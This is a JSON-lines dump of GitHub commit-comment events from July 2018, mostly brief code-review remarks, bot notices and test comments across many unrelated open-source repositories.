{"id":"7919133695","type":"CommitCommentEvent","actor":{"login":"rzr"},"repo":{"name":"mozilla-iot/webthing-node"},"payload":{"comment":{"id":29597156,"position":15,"line":27,"path":"lib/thing.js","commit_id":"82d5266393fac2eedc6f44356ae0868b8640a166","created_at":"2018-07-04T15:32:29Z","updated_at":"2018-07-04T15:32:29Z","author_association":"CONTRIBUTOR","body":"take your time it's not critical for me, I was just curious ;)\r\n"}},"created_at":"2018-07-04T15:32:29Z"}
{"id":"7919135787","type":"CommitCommentEvent","actor":{"login":"cybojenix"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29597160,"position":60,"line":60,"path":"lib/tennis.rb","commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:32:55Z","updated_at":"2018-07-04T15:32:55Z","author_association":"NONE","body":" seeing a negative difference is somewhat jarring. It's also not entirely clear what it means without context (The returning string, or looking at the actual `diff` code).\r\n\r\nIt might be worth making the return an absolute (always positive), and provide a method to say which player is in the lead"}},"created_at":"2018-07-04T15:32:55Z"}
{"id":"7919136484","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29597162,"position":14,"line":133,"path":"assembl/graphql/docstrings.py","commit_id":"80660318509ce5deb0f56b0e0b1604562716062b","created_at":"2018-07-04T15:33:06Z","updated_at":"2018-07-04T15:33:06Z","author_association":"MEMBER","body":"The language choice, \"This is a ....\", let's strive to avoid this lingo. Let's go for a more classical API description. Like, \"The img field is a header image URL/document object that will be visible on the Synthesis view's header.\""}},"created_at":"2018-07-04T15:33:06Z"}
{"id":"7919136714","type":"CommitCommentEvent","actor":{"login":"stingerbullet"},"repo":{"name":"stingerbullet/Hello-World"},"payload":{"comment":{"id":29597165,"position":null,"line":null,"path":null,"commit_id":"04791ddf43e514c879d36a2446ac68a618714c7d","created_at":"2018-07-04T15:33:09Z","updated_at":"2018-07-04T15:33:09Z","author_association":"OWNER","body":"Made changes to the original file for matters of later on merging back to the master repository"}},"created_at":"2018-07-04T15:33:09Z"}
{"id":"7919139015","type":"CommitCommentEvent","actor":{"login":"nbraud"},"repo":{"name":"bors-ng/bors-ng.github.io"},"payload":{"comment":{"id":29597169,"position":null,"line":null,"path":null,"commit_id":"4250a3b0ecb6eaa03201ebcfb4d89f80b9f0caa1","created_at":"2018-07-04T15:33:38Z","updated_at":"2018-07-04T15:33:38Z","author_association":"CONTRIBUTOR","body":"Thanks <3"}},"created_at":"2018-07-04T15:33:38Z"}
{"id":"7919140504","type":"CommitCommentEvent","actor":{"login":"kamiljaved98"},"repo":{"name":"organorg/MathLib"},"payload":{"comment":{"id":29597173,"position":null,"line":null,"path":null,"commit_id":"ef9c9aea3dbe8e9513db88ef3cd19ad513d0aee2","created_at":"2018-07-04T15:33:57Z","updated_at":"2018-07-04T15:33:57Z","author_association":"NONE","body":"TEST IMAGE: https://drive.google.com/open?id=1T0HT7ioynmBEFHxIljdlA1tibuTYGss-"}},"created_at":"2018-07-04T15:33:57Z"}
{"id":"7919142068","type":"CommitCommentEvent","actor":{"login":"farhanahaque"},"repo":{"name":"mayesha-mukarrama/group_3"},"payload":{"comment":{"id":29597175,"position":null,"line":null,"path":null,"commit_id":"e03fde63ff6406ab8c3e3759543661cf52e94f73","created_at":"2018-07-04T15:34:19Z","updated_at":"2018-07-04T15:34:19Z","author_association":"COLLABORATOR","body":"Idea Sumission"}},"created_at":"2018-07-04T15:34:19Z"}
{"id":"7919142473","type":"CommitCommentEvent","actor":{"login":"ciibot"},"repo":{"name":"coreinfrastructure/best-practices-badge"},"payload":{"comment":{"id":29597176,"position":40,"line":null,"path":"test/helpers/projects_helper_test.rb","commit_id":"88a1097b2ed1c7b6f40676ca0fd5b1072df4caa7","created_at":"2018-07-04T15:34:24Z","updated_at":"2018-07-04T15:34:24Z","author_association":"COLLABORATOR","body":"Layout/EmptyLines: Extra blank line detected. (https://github.com/bbatsov/ruby-style-guide#two-or-more-empty-lines)"}},"created_at":"2018-07-04T15:34:24Z"}
{"id":"7919151615","type":"CommitCommentEvent","actor":{"login":"thivisha2003"},"repo":{"name":"thivisha2003/thivisha2003.github.io"},"payload":{"comment":{"id":29597198,"position":null,"line":null,"path":null,"commit_id":"665e5729ceaf250d41c372f484c43abff44deec6","created_at":"2018-07-04T15:36:31Z","updated_at":"2018-07-04T15:36:31Z","author_association":"OWNER","body":"updating\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-04T15:36:31Z"}
{"id":"7919154571","type":"CommitCommentEvent","actor":{"login":"peppelinux"},"repo":{"name":"2stacks/django-freeradius"},"payload":{"comment":{"id":29597204,"position":65,"line":65,"path":"django_freeradius/utils.py","commit_id":"fcd2d5988d0a471febace5055ab3d3a0e3a4e1bb","created_at":"2018-07-04T15:37:08Z","updated_at":"2018-07-04T15:37:08Z","author_association":"NONE","body":"Could it be better use StringIO instead of a real file system file?"}},"created_at":"2018-07-04T15:37:08Z"}
{"id":"7919161833","type":"CommitCommentEvent","actor":{"login":"peak3d"},"repo":{"name":"Sandmann79/xbmc"},"payload":{"comment":{"id":29597223,"position":13,"line":46,"path":"plugin.video.amazon/resources/lib/common.py","commit_id":"1386ecf9bf8d515114dce7947b327865bc052482","created_at":"2018-07-04T15:38:39Z","updated_at":"2018-07-04T15:38:39Z","author_association":"NONE","body":"service.py and default.py are completely different interpreter sessions / tasks,\r\nTherefore its ok,/ right, that both have its own addon instance.\r\n\r\nOT.: This is b.t.w. the reason why xchanging settings between service and default is not working (without re-opeing addon): addon::get / set settings apply to the instance cache, and only if you destroy the instance, they are serialized to disk."}},"created_at":"2018-07-04T15:38:39Z"}
{"id":"7919162043","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29597224,"position":null,"line":null,"path":null,"commit_id":"e15ed44e8b5c4f969adff3d25e6147631e6cc445","created_at":"2018-07-04T15:38:41Z","updated_at":"2018-07-04T15:38:41Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Включать equipmentType в equipment по аналогии с eventType](https://trello.com/c/vs0BihRL/49-%D0%B2%D0%BA%D0%BB%D1%8E%D1%87%D0%B0%D1%82%D1%8C-equipmenttype-%D0%B2-equipment-%D0%BF%D0%BE-%D0%B0%D0%BD%D0%B0%D0%BB%D0%BE%D0%B3%D0%B8%D0%B8-%D1%81-eventtype)"}},"created_at":"2018-07-04T15:38:41Z"}
{"id":"7919162594","type":"CommitCommentEvent","actor":{"login":"gnivler"},"repo":{"name":"janxious/BT-WeaponVariance"},"payload":{"comment":{"id":29597225,"position":null,"line":null,"path":null,"commit_id":"3e0e560ced5f09f6462e33a48e2f278fa6aa28e7","created_at":"2018-07-04T15:38:49Z","updated_at":"2018-07-04T15:38:49Z","author_association":"NONE","body":"nice refactoring example I've reviewed it again, didn't have the diff last time.   intense code!"}},"created_at":"2018-07-04T15:38:49Z"}
{"id":"7919169639","type":"CommitCommentEvent","actor":{"login":"yuzi-co"},"repo":{"name":"Fedeparma74/Megaminer"},"payload":{"comment":{"id":29597245,"position":25,"line":643,"path":"Include.ps1","commit_id":"14fdef70a5351f6987cbc4ebf521347c9261d83b","created_at":"2018-07-04T15:40:24Z","updated_at":"2018-07-04T15:40:24Z","author_association":"NONE","body":"It doesn't work with the regular $Writer.WriteLine($Request) ?\r\n"}},"created_at":"2018-07-04T15:40:24Z"}
{"id":"7919170995","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29597250,"position":10,"line":10,"path":"Assets/Scritpt/Gameplay/Seguir.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T15:40:40Z","updated_at":"2018-07-04T15:40:40Z","author_association":"OWNER","body":"Aqui é um exemplo de lugar onde eu poderia deixar como uma constante, mas eu acabo impedindo o game designer de balancear o jogo, já que essa propriedade não apareceria na interface gráfica da unity"}},"created_at":"2018-07-04T15:40:40Z"}
{"id":"7919172339","type":"CommitCommentEvent","actor":{"login":"UndeadKernel"},"repo":{"name":"hlissner/doom-emacs"},"payload":{"comment":{"id":29597255,"position":null,"line":null,"path":null,"commit_id":"d0eaa0af1e4adf706cbc5cc8299097cbadea0f10","created_at":"2018-07-04T15:40:59Z","updated_at":"2018-07-04T15:40:59Z","author_association":"CONTRIBUTOR","body":"Hi @hlissner, I'm not sure how I feel about the evil hard-coded bindings displayed in the dashboard. As a non-evil user, I'd expect to see either emacs-like bindings or nothing instead of the current evil bindings.\r\n\r\nI'd be glad to PL something that changes the bindings depending on whether `evil` is enabled or not. But as I know that you are holding hostage ( :P ) the default emacs bindings until version 2.1, I think we should find an alternative.\r\n\r\nWhat do you think? "}},"created_at":"2018-07-04T15:40:59Z"}
{"id":"7919177958","type":"CommitCommentEvent","actor":{"login":"just1602"},"repo":{"name":"riseupnet/riseup_help"},"payload":{"comment":{"id":29597269,"position":4,"line":6,"path":"pages/about-us/press/en.text","commit_id":"50e0d80a20392ae9de97da2813aff4a0b153299d","created_at":"2018-07-04T15:42:19Z","updated_at":"2018-07-04T15:42:19Z","author_association":"CONTRIBUTOR","body":"@micah we're in 2018 ! ;)"}},"created_at":"2018-07-04T15:42:19Z"}
{"id":"7919178330","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597270,"position":57,"line":323,"path":"code/stable/nopcm/SRS/NoPCM_SRS.tex","commit_id":"00549b29b604b4ebf94456ee1ba9a915fccda49c","created_at":"2018-07-04T15:42:24Z","updated_at":"2018-07-04T15:42:24Z","author_association":"COLLABORATOR","body":"There's a lot more information in the old than the new. Make sure we have issues for the missing info."}},"created_at":"2018-07-04T15:42:24Z"}
{"id":"7919178428","type":"CommitCommentEvent","actor":{"login":"KellyRosales"},"repo":{"name":"KellyRosales/lim-2018-05-bc-core-am-datadashboard"},"payload":{"comment":{"id":29597271,"position":null,"line":null,"path":null,"commit_id":"1918e99a502797ab07eea8438d51ded6a0b24698","created_at":"2018-07-04T15:42:26Z","updated_at":"2018-07-04T15:42:26Z","author_association":"OWNER","body":"añadiendo carpeta css y font con maquetación, antes subida en la rama develop "}},"created_at":"2018-07-04T15:42:26Z"}
{"id":"7919179136","type":"CommitCommentEvent","actor":{"login":"UnSkin"},"repo":{"name":"CodeSquadPie/GameDev"},"payload":{"comment":{"id":29597274,"position":null,"line":null,"path":null,"commit_id":"3131341f3c26da6d21f307810529a7dc18564522","created_at":"2018-07-04T15:42:37Z","updated_at":"2018-07-04T15:42:37Z","author_association":"NONE","body":"Дичь"}},"created_at":"2018-07-04T15:42:37Z"}
{"id":"7919182230","type":"CommitCommentEvent","actor":{"login":"mhong"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29597279,"position":605,"line":605,"path":"lib/SILOptimizer/Mandatory/TFDevicePartition.cpp","commit_id":"e6a4921de5ad48580d0a59705e49b337015ae596","created_at":"2018-07-04T15:43:18Z","updated_at":"2018-07-04T15:43:18Z","author_association":"COLLABORATOR","body":"Thanks. Will fix."}},"created_at":"2018-07-04T15:43:18Z"}
{"id":"7919183397","type":"CommitCommentEvent","actor":{"login":"ryanshores"},"repo":{"name":"MatthewsDaniel/stormtracker"},"payload":{"comment":{"id":29597281,"position":null,"line":null,"path":null,"commit_id":"93fdd23c21ed34308b1f776ea1fd194c747d4d4f","created_at":"2018-07-04T15:43:34Z","updated_at":"2018-07-04T15:43:34Z","author_association":"CONTRIBUTOR","body":"Fixes issue #61 "}},"created_at":"2018-07-04T15:43:34Z"}
{"id":"7919183979","type":"CommitCommentEvent","actor":{"login":"RachelPeled"},"repo":{"name":"RachelPeled/rachel_proj"},"payload":{"comment":{"id":29597282,"position":null,"line":null,"path":null,"commit_id":"a41eadaed5361ec7821c41a972e53918db618cd8","created_at":"2018-07-04T15:43:43Z","updated_at":"2018-07-04T15:43:43Z","author_association":"OWNER","body":"Hello I'm Rachel "}},"created_at":"2018-07-04T15:43:43Z"}
{"id":"7919184456","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597284,"position":101,"line":340,"path":"code/stable/nopcm/SRS/NoPCM_SRS.tex","commit_id":"00549b29b604b4ebf94456ee1ba9a915fccda49c","created_at":"2018-07-04T15:43:50Z","updated_at":"2018-07-04T15:43:50Z","author_association":"COLLABORATOR","body":"Ditto."}},"created_at":"2018-07-04T15:43:50Z"}
{"id":"7919185978","type":"CommitCommentEvent","actor":{"login":"CTCaer"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29597286,"position":null,"line":null,"path":null,"commit_id":"ebb9ca5bf56c28824cfbea4b0cb0668e6df7cb32","created_at":"2018-07-04T15:44:11Z","updated_at":"2018-07-04T15:44:11Z","author_association":"OWNER","body":"This also removes the \"Remove archive bit (all sd files)\" option.\r\nIt's hit or miss, anyway."}},"created_at":"2018-07-04T15:44:11Z"}
{"id":"7919187697","type":"CommitCommentEvent","actor":{"login":"alashow"},"repo":{"name":"Laravel-Backpack/CRUD"},"payload":{"comment":{"id":29597292,"position":10,"line":7,"path":"src/resources/views/columns/model_function.blade.php","commit_id":"98c4306063da4ea555aa0a282b8f25cfc9ff997d","created_at":"2018-07-04T15:44:34Z","updated_at":"2018-07-04T15:44:34Z","author_association":"CONTRIBUTOR","body":"@tabacitu This change broke my upgrade and it took me hours to get to the source of breaking change. \r\n\r\nI was using `model_function` to return `view()` which would show rendered html of my view."}},"created_at":"2018-07-04T15:44:34Z"}
{"id":"7919188462","type":"CommitCommentEvent","actor":{"login":"Fedeparma74"},"repo":{"name":"Fedeparma74/Megaminer"},"payload":{"comment":{"id":29597293,"position":25,"line":643,"path":"Include.ps1","commit_id":"14fdef70a5351f6987cbc4ebf521347c9261d83b","created_at":"2018-07-04T15:44:44Z","updated_at":"2018-07-04T15:44:44Z","author_association":"OWNER","body":"No, it sends \"summary\\r\\n\" instead of \"summary\". They said will fix it soon."}},"created_at":"2018-07-04T15:44:44Z"}
{"id":"7919188689","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29597294,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T15:44:48Z","updated_at":"2018-07-04T15:44:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T15:44:48Z"}
{"id":"7919188892","type":"CommitCommentEvent","actor":{"login":"hbetts"},"repo":{"name":"renovatebot/renovate"},"payload":{"comment":{"id":29597296,"position":12,"line":12,"path":"website/docs/python.md","commit_id":"7ca7cd01f7df13aadb21312b4e16b44b44362f36","created_at":"2018-07-04T15:44:50Z","updated_at":"2018-07-04T15:44:50Z","author_association":"COLLABORATOR","body":"`as not supported` => `are not supported`?"}},"created_at":"2018-07-04T15:44:50Z"}
{"id":"7919192249","type":"CommitCommentEvent","actor":{"login":"hbetts"},"repo":{"name":"renovatebot/renovate"},"payload":{"comment":{"id":29597310,"position":16,"line":16,"path":"website/docs/python.md","commit_id":"7ca7cd01f7df13aadb21312b4e16b44b44362f36","created_at":"2018-07-04T15:45:35Z","updated_at":"2018-07-04T15:45:35Z","author_association":"COLLABORATOR","body":"`Renovate will search each repository for `requirements` files.`"}},"created_at":"2018-07-04T15:45:35Z"}
{"id":"7919194588","type":"CommitCommentEvent","actor":{"login":"bluejakester"},"repo":{"name":"bluejakester/test"},"payload":{"comment":{"id":29597314,"position":null,"line":null,"path":null,"commit_id":"372264ecef321268c3460e0bee4db8a73965da2b","created_at":"2018-07-04T15:46:07Z","updated_at":"2018-07-04T15:46:07Z","author_association":"OWNER","body":"Works!"}},"created_at":"2018-07-04T15:46:07Z"}
{"id":"7919195480","type":"CommitCommentEvent","actor":{"login":"Tomsanm"},"repo":{"name":"Tomsanm/DataStructureandAlgorithms"},"payload":{"comment":{"id":29597316,"position":null,"line":null,"path":null,"commit_id":"faf05fb580d7252906a06bbc903c11179a8dd1ad","created_at":"2018-07-04T15:46:18Z","updated_at":"2018-07-04T15:46:18Z","author_association":"OWNER","body":"![default](https://user-images.githubusercontent.com/28773741/42286131-67d1c936-7fe4-11e8-8814-a3170f8b29ca.png)\r\n"}},"created_at":"2018-07-04T15:46:18Z"}
{"id":"7919196190","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29597318,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-04T15:46:27Z","updated_at":"2018-07-04T15:46:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T15:46:27Z"}
{"id":"7919201963","type":"CommitCommentEvent","actor":{"login":"spinks"},"repo":{"name":"spinks/Nano-Minesweeper"},"payload":{"comment":{"id":29597330,"position":null,"line":null,"path":null,"commit_id":"58a66afd974317dd76ecac45ffb8f286a0621ac4","created_at":"2018-07-04T15:47:44Z","updated_at":"2018-07-04T15:47:44Z","author_association":"OWNER","body":"Changes also mean that the display now correctly emulates traditional minesweeper, i.e. when game is over only mines are revealed not numbers."}},"created_at":"2018-07-04T15:47:44Z"}
{"id":"7919204115","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/embree3-feedstock"},"payload":{"comment":{"id":29597339,"position":null,"line":null,"path":null,"commit_id":"4ef8503bbb040fe3d9881343e9da2c5a48f18868","created_at":"2018-07-04T15:48:13Z","updated_at":"2018-07-04T15:48:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @joaander were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-04T15:48:13Z"}
{"id":"7919204389","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29597340,"position":null,"line":null,"path":null,"commit_id":"55c445ee86bcac8453fb2efacfc396330d580345","created_at":"2018-07-04T15:48:17Z","updated_at":"2018-07-04T15:48:17Z","author_association":"NONE","body":"Puzzle `6-f97f5c14` discovered in   [`src/main/java/io/zold/api/Wallet.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java)   and submitted as #15. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-04T15:48:17Z"}
{"id":"7919204606","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29597342,"position":null,"line":null,"path":null,"commit_id":"55c445ee86bcac8453fb2efacfc396330d580345","created_at":"2018-07-04T15:48:20Z","updated_at":"2018-07-04T15:48:20Z","author_association":"NONE","body":"Puzzle `6-af7c6ffd` discovered in   [`src/main/java/io/zold/api/Wallet.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java)   and submitted as #16. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-04T15:48:20Z"}
{"id":"7919204769","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29597344,"position":null,"line":null,"path":null,"commit_id":"55c445ee86bcac8453fb2efacfc396330d580345","created_at":"2018-07-04T15:48:22Z","updated_at":"2018-07-04T15:48:22Z","author_association":"NONE","body":"Puzzle `6-2cc9aa8f` discovered in   [`src/main/java/io/zold/api/Wallet.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java)   and submitted as #17. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-04T15:48:22Z"}
{"id":"7919205986","type":"CommitCommentEvent","actor":{"login":"duwolf1983"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29597346,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-04T15:48:39Z","updated_at":"2018-07-04T15:48:39Z","author_association":"NONE","body":"@minglich please minglich share with us or sell to us :D"}},"created_at":"2018-07-04T15:48:39Z"}
{"id":"7919207059","type":"CommitCommentEvent","actor":{"login":"StudentBlake"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29597347,"position":null,"line":null,"path":null,"commit_id":"109bed26c6e81037a89798d392788fcd8b2b2dd7","created_at":"2018-07-04T15:48:54Z","updated_at":"2018-07-04T15:48:54Z","author_association":"CONTRIBUTOR","body":"What wasn't working properly? The only situation I can think of is if you load the program, change the filenames without refreshing, then try a batch job. If that's the case, wouldn't it be easier to do something like this?\r\n```\r\n//Make sure lboxFiles is up to date to match files\r\nUpdateFileList();\r\nfiles = Util.GetXCIsInFolder(selectedPath);\r\n```\r\nI'm curious as to what broke because. (I did end up destroying a few XCI in the process of making this feature lol)"}},"created_at":"2018-07-04T15:48:54Z"}
{"id":"7919211007","type":"CommitCommentEvent","actor":{"login":"nurse"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29597356,"position":null,"line":null,"path":null,"commit_id":"df4a126d65e4690e9301392974fcc9adf7d4c474","created_at":"2018-07-04T15:49:51Z","updated_at":"2018-07-04T15:49:51Z","author_association":"MEMBER","body":"> I think it was actually r63820 get rid of a compiler warning of VC that caused the mswin build to lock during test-all, as seen here on Appveyor. It was passing as of the previous commit, r63816. This (obviously) could mask other issues.\r\n\r\nAs far as I understand, its `waitpid_sys()` is broken. It's why r63820's fix has side effect.\r\n\r\n> Then, the issue with test/ruby/test_time_tz.rb, which was fixed by r63839. Also, see Bug #14890.\r\n\r\nSure, I closed it."}},"created_at":"2018-07-04T15:49:51Z"}
{"id":"7919212170","type":"CommitCommentEvent","actor":{"login":"saladinjake"},"repo":{"name":"saladinjake/sprinttex"},"payload":{"comment":{"id":29597358,"position":null,"line":null,"path":null,"commit_id":"8805269b10637a3f040b57e9d3f0aa21c8e695f5","created_at":"2018-07-04T15:50:08Z","updated_at":"2018-07-04T15:50:08Z","author_association":"OWNER","body":"Changes would be made to node_modules and would not be tracked by github due to varying dependency issues"}},"created_at":"2018-07-04T15:50:08Z"}
{"id":"7919212753","type":"CommitCommentEvent","actor":{"login":"SebAshton"},"repo":{"name":"elcorbs/tennis_kata"},"payload":{"comment":{"id":29597360,"position":72,"line":72,"path":"lib/tennis.rb","commit_id":"985c26e961b370b78edcf9cc175de354245dcf13","created_at":"2018-07-04T15:50:16Z","updated_at":"2018-07-04T15:50:16Z","author_association":"NONE","body":"this might look neater as interpolation `\"#{@player1score}-#{@player2score}\"`"}},"created_at":"2018-07-04T15:50:16Z"}
{"id":"7919212828","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29597361,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-04T15:50:17Z","updated_at":"2018-07-04T15:50:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T15:50:17Z"}
{"id":"7919213225","type":"CommitCommentEvent","actor":{"login":"ZaifSenpai"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29597364,"position":59,"line":59,"path":"Vidly/Controllers/Api/MoviesController.cs","commit_id":"c79f75ed0acd3be596525ef3bd346b45413ea51f","created_at":"2018-07-04T15:50:21Z","updated_at":"2018-07-04T15:50:21Z","author_association":"NONE","body":"I was using following JSON for PUT request but getting error.\r\n```\r\n{\r\n\"name\": \"Titanic 3\",\r\n\"genreId\": 4,\r\n\"releaseDate\": \"2018-01-15T00:00:00\",\r\n\"numberInStock\": 3\r\n}\r\n```\r\nSo I added this line before mapping which resolved this issue:\r\n`movieDto.DateAdded = movieInDb.DateAdded;`"}},"created_at":"2018-07-04T15:50:21Z"}
{"id":"7919213664","type":"CommitCommentEvent","actor":{"login":"sebastianst"},"repo":{"name":"sebastianst/ABY"},"payload":{"comment":{"id":29597366,"position":14,"line":70,"path":"src/abycore/circuit/share.cpp","commit_id":"a58ffc95d7c4ac5fefcc46b915e61a7f0d58e36d","created_at":"2018-07-04T15:50:27Z","updated_at":"2018-07-04T15:50:27Z","author_association":"OWNER","body":"done 43eb2359258"}},"created_at":"2018-07-04T15:50:27Z"}
{"id":"7919214462","type":"CommitCommentEvent","actor":{"login":"philippegu56"},"repo":{"name":"lunarok/jeedom_espeasy"},"payload":{"comment":{"id":29597371,"position":null,"line":null,"path":null,"commit_id":"3ed606fb55cc8a4f6910235a67c0ad915e0c4455","created_at":"2018-07-04T15:50:39Z","updated_at":"2018-07-04T15:50:39Z","author_association":"NONE","body":"Bonjour, juste pour finir l'affichage des images j'ai fait ça :\r\ndans \r\nligne 81 : $dir = dirname(__FILE__) . '/../../resources/';\r\nligne 89 : $path = 'resources/node_' . $eqLogic->getConfiguration('icone');\r\nligne 91 : $path = 'plugin_info/espeasy_icon';\r\nligne 93 : echo '<img src=\"plugins/espeasy/' . $path . '.png\" height=\"105\" width=\"95\" />';\r\nligne 286 var text = 'plugins/espeasy/resources/node_' + $(\"#sel_icon\").val() + '.png';\r\n\r\nmanque juste l'image si aucun slectionnée dans la config\r\n\r\nken@vo\r\nPhil\r\n"}},"created_at":"2018-07-04T15:50:39Z"}
{"id":"7919215138","type":"CommitCommentEvent","actor":{"login":"StevenLeighton21"},"repo":{"name":"elcorbs/tennis_kata"},"payload":{"comment":{"id":29597374,"position":40,"line":40,"path":"spec/tennis_spec.rb","commit_id":"985c26e961b370b78edcf9cc175de354245dcf13","created_at":"2018-07-04T15:50:48Z","updated_at":"2018-07-04T15:50:48Z","author_association":"NONE","body":"I think the context should read player 2?"}},"created_at":"2018-07-04T15:50:48Z"}
{"id":"7919217371","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29597383,"position":null,"line":null,"path":null,"commit_id":"a1faa51c234cff1440a722de61738c5c897718b5","created_at":"2018-07-04T15:51:19Z","updated_at":"2018-07-04T15:51:19Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/doc-review-accesscontrol. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-04T15:51:19Z"}
{"id":"7919217378","type":"CommitCommentEvent","actor":{"login":"cuilingyin"},"repo":{"name":"cuilingyin/dabei"},"payload":{"comment":{"id":29597384,"position":null,"line":null,"path":null,"commit_id":"6dde1dd0b440159129bd28e3cc205700d8171920","created_at":"2018-07-04T15:51:19Z","updated_at":"2018-07-04T15:51:19Z","author_association":"OWNER","body":"11111"}},"created_at":"2018-07-04T15:51:19Z"}
